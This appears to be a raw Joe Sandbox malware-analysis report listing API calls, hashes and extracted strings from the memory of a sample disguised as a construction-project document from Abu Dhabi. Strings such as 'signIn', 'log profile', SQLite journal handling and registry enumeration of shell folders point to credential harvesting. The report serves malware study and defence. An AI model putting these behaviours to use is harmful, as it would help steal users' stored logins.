                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                          • String ID: AE$.cfg$General$EA
                                                                                                                          • API String ID: 776488737-1622828088
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040D8BD
                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                          • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                          • memset.MSVCRT ref: 0040D906
                                                                                                                          • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                          • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                            • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                            • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                          • String ID: sysdatetimepick32
                                                                                                                          • API String ID: 1028950076-4169760276
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                          • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                          • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                          • memset.MSVCRT ref: 0041BA3D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memset
                                                                                                                          • String ID: -journal$-wal
                                                                                                                          • API String ID: 438689982-2894717839
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                          • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                            • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                            • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                          • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Item$Dialog$MessageSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3975816621-0
                                                                                                                          • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                          • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                          • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                          • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                          APIs
                                                                                                                          • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                          • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                          • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                          • String ID: .save$http://$https://$log profile$signIn
                                                                                                                          • API String ID: 1214746602-2708368587
                                                                                                                          • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                                          • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                          • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                                          • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                          APIs
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                                          • memset.MSVCRT ref: 00405E33
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                                          • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2313361498-0
                                                                                                                          • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                          • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                          • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                          • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                          APIs
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                          • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                            • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                          • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                          • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$ItemMessageRectSend$Client
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2047574939-0
                                                                                                                          • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                                          • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                          • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                                          • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                          APIs
                                                                                                                          • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                          • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                          • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4218492932-0
                                                                                                                          • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                          • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                          • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                          • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                          • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                          • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                          • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                          • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                          • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                          • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memset
                                                                                                                          • String ID: gj
                                                                                                                          • API String ID: 438689982-4203073231
                                                                                                                          • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                          • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                          • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                          • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy
                                                                                                                          • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                          • API String ID: 3510742995-2446657581
                                                                                                                          • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                          • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                          • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                          • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                          • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                          • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                          • memset.MSVCRT ref: 00405ABB
                                                                                                                          • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                          • SetFocus.USER32(?), ref: 00405B76
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$FocusItemmemset
                                                                                                                          • String ID:
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: _snwprintfwcscat
                                                                                                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                          • String ID: 0$6
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                          • memset.MSVCRT ref: 00405455
                                                                                                                          • memset.MSVCRT ref: 0040546C
                                                                                                                          • memset.MSVCRT ref: 00405483
                                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$memcpy$ErrorLast
                                                                                                                          • String ID: 6$\
                                                                                                                          APIs
                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                          • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                          • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                          • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                          • wcscpy.MSVCRT ref: 0040A107
                                                                                                                          Similarity
                                                                                                                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                          • String ID:
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                          • String ID: advapi32.dll
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                          • <%s>, xrefs: 004100A6
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: wcscat$_snwprintfmemset
                                                                                                                          • String ID: %2.2X
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: _snwprintfwcscpy
                                                                                                                          • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                          APIs
                                                                                                                          • strlen.MSVCRT ref: 00408DFA
                                                                                                                            • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                          • memset.MSVCRT ref: 00408E46
                                                                                                                          • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                          • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                          • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memsetstrlen
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: memset
                                                                                                                          • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                          APIs
                                                                                                                          • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                                          • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                                                          • memset.MSVCRT ref: 00408FD4
                                                                                                                          • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                                                          • memset.MSVCRT ref: 00409042
                                                                                                                          • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                                            • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                            • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                            • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                          • memset.MSVCRT ref: 0040C439
                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                          • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                          • memset.MSVCRT ref: 0040C4D0
                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
